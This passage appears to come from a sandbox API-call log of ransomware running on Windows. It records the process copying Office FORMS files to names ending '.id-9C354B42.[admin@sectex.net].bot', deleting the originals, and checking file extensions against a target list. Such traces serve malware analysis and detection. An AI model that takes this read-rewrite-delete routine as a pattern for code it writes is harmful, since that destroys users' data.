	[0160.862] ReadFile (in: hFile=0x388, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.862] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0160.862] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.863] CloseHandle (hObject=0x3d0) returned 1
	[0160.863] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.863] SetEndOfFile (hFile=0x388) returned 1
	[0160.865] CloseHandle (hObject=0x388) returned 1
	[0160.865] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.865] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipm.cfg")) returned 1
	[0160.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.866] lstrlenW (lpString=".doc") returned 4
	[0160.866] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString=".docx") returned 5
	[0160.866] lstrcmpiW (lpString1=".docx", lpString2="M.CFG") returned -1
	[0160.866] lstrlenW (lpString=".pdf") returned 4
	[0160.866] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString=".xls") returned 4
	[0160.866] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString=".xlsx") returned 5
	[0160.866] lstrcmpiW (lpString1=".xlsx", lpString2="M.CFG") returned -1
	[0160.866] lstrlenW (lpString=".ppt") returned 4
	[0160.866] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.866] lstrlenW (lpString=".zip") returned 4
	[0160.866] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString=".rar") returned 4
	[0160.866] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString=".bz2") returned 4
	[0160.866] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.866] lstrlenW (lpString=".7z") returned 3
	[0160.866] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.866] lstrlenW (lpString=".dbf") returned 4
	[0160.866] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.866] lstrlenW (lpString=".1cd") returned 4
	[0160.866] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.866] lstrlenW (lpString=".jpg") returned 4
	[0160.867] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.867] lstrlenW (lpString=".doc") returned 4
	[0160.867] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString=".docx") returned 5
	[0160.867] lstrcmpiW (lpString1=".docx", lpString2="M.CFG") returned -1
	[0160.867] lstrlenW (lpString=".pdf") returned 4
	[0160.867] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString=".xls") returned 4
	[0160.867] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString=".xlsx") returned 5
	[0160.867] lstrcmpiW (lpString1=".xlsx", lpString2="M.CFG") returned -1
	[0160.867] lstrlenW (lpString=".ppt") returned 4
	[0160.867] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.867] lstrlenW (lpString=".zip") returned 4
	[0160.867] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString=".rar") returned 4
	[0160.867] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString=".bz2") returned 4
	[0160.867] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.867] lstrlenW (lpString=".7z") returned 3
	[0160.867] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.867] lstrlenW (lpString=".dbf") returned 4
	[0160.867] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.867] lstrlenW (lpString=".1cd") returned 4
	[0160.867] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPM.CFG") returned 61
	[0160.868] lstrlenW (lpString=".jpg") returned 4
	[0160.868] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.868] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.868] lstrlenW (lpString="IPML.ICO") returned 8
	[0160.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.272] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1078) returned 1
	[0161.272] CloseHandle (hObject=0x37c) returned 1
	[0161.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico")) returned 0x20
	[0161.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.283] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.283] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.284] GetLastError () returned 0x0
	[0161.284] ReadFile (in: hFile=0x3c4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.286] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.287] ReadFile (in: hFile=0x3c4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.287] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.287] SetEndOfFile (hFile=0x37c) returned 1
	[0161.287] CloseHandle (hObject=0x37c) returned 1
	[0161.287] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.287] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.289] CloseHandle (hObject=0x3c4) returned 1
	[0161.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.289] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ipml.ico")) returned 1
	[0161.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.290] lstrlenW (lpString=".doc") returned 4
	[0161.290] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.290] lstrlenW (lpString=".docx") returned 5
	[0161.290] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.290] lstrlenW (lpString=".pdf") returned 4
	[0161.290] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.290] lstrlenW (lpString=".xls") returned 4
	[0161.290] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.290] lstrlenW (lpString=".xlsx") returned 5
	[0161.290] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.290] lstrlenW (lpString=".ppt") returned 4
	[0161.290] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.290] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.290] lstrlenW (lpString=".zip") returned 4
	[0161.290] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.290] lstrlenW (lpString=".rar") returned 4
	[0161.290] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.290] lstrlenW (lpString=".bz2") returned 4
	[0161.290] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.291] lstrlenW (lpString=".7z") returned 3
	[0161.291] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.291] lstrlenW (lpString=".dbf") returned 4
	[0161.291] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.291] lstrlenW (lpString=".1cd") returned 4
	[0161.291] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.291] lstrlenW (lpString=".jpg") returned 4
	[0161.291] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.291] lstrlenW (lpString=".doc") returned 4
	[0161.291] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.291] lstrlenW (lpString=".docx") returned 5
	[0161.291] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.291] lstrlenW (lpString=".pdf") returned 4
	[0161.291] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.291] lstrlenW (lpString=".xls") returned 4
	[0161.291] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.291] lstrlenW (lpString=".xlsx") returned 5
	[0161.291] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.291] lstrlenW (lpString=".ppt") returned 4
	[0161.291] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.291] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.291] lstrlenW (lpString=".zip") returned 4
	[0161.291] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.291] lstrlenW (lpString=".rar") returned 4
	[0161.291] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.291] lstrlenW (lpString=".bz2") returned 4
	[0161.292] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.292] lstrlenW (lpString=".7z") returned 3
	[0161.292] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.292] lstrlenW (lpString=".dbf") returned 4
	[0161.292] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.292] lstrlenW (lpString=".1cd") returned 4
	[0161.292] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\IPML.ICO") returned 62
	[0161.292] lstrlenW (lpString=".jpg") returned 4
	[0161.292] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.292] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.292] lstrlenW (lpString="OOFTMPL.CFG") returned 11
	[0161.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.293] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=828) returned 1
	[0161.293] CloseHandle (hObject=0x3c4) returned 1
	[0161.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg")) returned 0x20
	[0161.293] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.293] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.293] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.294] GetLastError () returned 0x0
	[0161.294] ReadFile (in: hFile=0x3c4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x33c, lpOverlapped=0x0) returned 1
	[0161.295] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x340, lpOverlapped=0x0) returned 1
	[0161.296] ReadFile (in: hFile=0x3c4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.296] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0161.296] SetEndOfFile (hFile=0x37c) returned 1
	[0161.296] CloseHandle (hObject=0x37c) returned 1
	[0161.297] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.297] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.299] CloseHandle (hObject=0x3c4) returned 1
	[0161.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.299] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\ooftmpl.cfg")) returned 1
	[0161.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.300] lstrlenW (lpString=".doc") returned 4
	[0161.300] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.300] lstrlenW (lpString=".docx") returned 5
	[0161.300] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0161.300] lstrlenW (lpString=".pdf") returned 4
	[0161.300] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.300] lstrlenW (lpString=".xls") returned 4
	[0161.300] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.300] lstrlenW (lpString=".xlsx") returned 5
	[0161.300] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0161.300] lstrlenW (lpString=".ppt") returned 4
	[0161.300] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.300] lstrlenW (lpString=".zip") returned 4
	[0161.300] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString=".rar") returned 4
	[0161.301] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString=".bz2") returned 4
	[0161.301] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.301] lstrlenW (lpString=".7z") returned 3
	[0161.301] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.301] lstrlenW (lpString=".dbf") returned 4
	[0161.301] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.301] lstrlenW (lpString=".1cd") returned 4
	[0161.301] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.301] lstrlenW (lpString=".jpg") returned 4
	[0161.301] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.301] lstrlenW (lpString=".doc") returned 4
	[0161.301] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString=".docx") returned 5
	[0161.301] lstrcmpiW (lpString1=".docx", lpString2="L.CFG") returned -1
	[0161.301] lstrlenW (lpString=".pdf") returned 4
	[0161.301] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString=".xls") returned 4
	[0161.301] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString=".xlsx") returned 5
	[0161.301] lstrcmpiW (lpString1=".xlsx", lpString2="L.CFG") returned -1
	[0161.301] lstrlenW (lpString=".ppt") returned 4
	[0161.301] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.301] lstrlenW (lpString=".zip") returned 4
	[0161.302] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.302] lstrlenW (lpString=".rar") returned 4
	[0161.302] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.302] lstrlenW (lpString=".bz2") returned 4
	[0161.302] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.302] lstrlenW (lpString=".7z") returned 3
	[0161.302] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.302] lstrlenW (lpString=".dbf") returned 4
	[0161.302] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.302] lstrlenW (lpString=".1cd") returned 4
	[0161.302] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\OOFTMPL.CFG") returned 65
	[0161.302] lstrlenW (lpString=".jpg") returned 4
	[0161.302] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.302] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.302] lstrlenW (lpString="POST.CFG") returned 8
	[0161.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.303] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=777) returned 1
	[0161.303] CloseHandle (hObject=0x3c4) returned 1
	[0161.303] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg")) returned 0x20
	[0161.303] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.303] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.303] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.304] GetLastError () returned 0x0
	[0161.304] ReadFile (in: hFile=0x3c4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x309, lpOverlapped=0x0) returned 1
	[0161.305] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x310, lpOverlapped=0x0) returned 1
	[0161.310] ReadFile (in: hFile=0x3c4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
